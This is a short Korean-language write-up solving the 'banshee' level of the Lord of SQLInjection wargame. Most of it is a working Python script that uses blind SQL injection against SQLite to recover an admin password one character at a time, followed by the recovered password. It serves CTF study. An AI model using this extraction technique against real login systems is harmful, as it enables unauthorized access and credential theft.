# banshee

첫 화면이다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-n6ZBRHsZbF2l_MrVl%2F-M-n6hqAZ01SPzeTGP5d%2Fimage.png?alt=media\&token=3fa882ab-3f3b-4370-9319-1d99f77a7a37)

파이썬 코드를 짜면 아래와 같다.

SQLite의 `UNICODE()` 를 MySQL의 `ASCII()` 나 `ORD()`  대신 사용하였다.

```python
import requests

URL = 'https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?pw='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'login success!'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 8
def find_pw_length():
    pw_len = 1
    while query("' or id='admin' and length(pw)={}--".format(pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# 0313091b
def find_pw():
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query("' or id='admin' and unicode(substr(pw,{},1))={}--".format(pos, character)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()
```

실행결과, pw는 `0313091b` 이다.

<https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?pw=0313091b> 에 접속하면 문제가 풀린다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nAWzu376m9axoIB28%2F-M-nAZIhObsIBluLA1to%2Fimage.png?alt=media\&token=32c089e5-1aea-417a-908b-0f1931d958e7)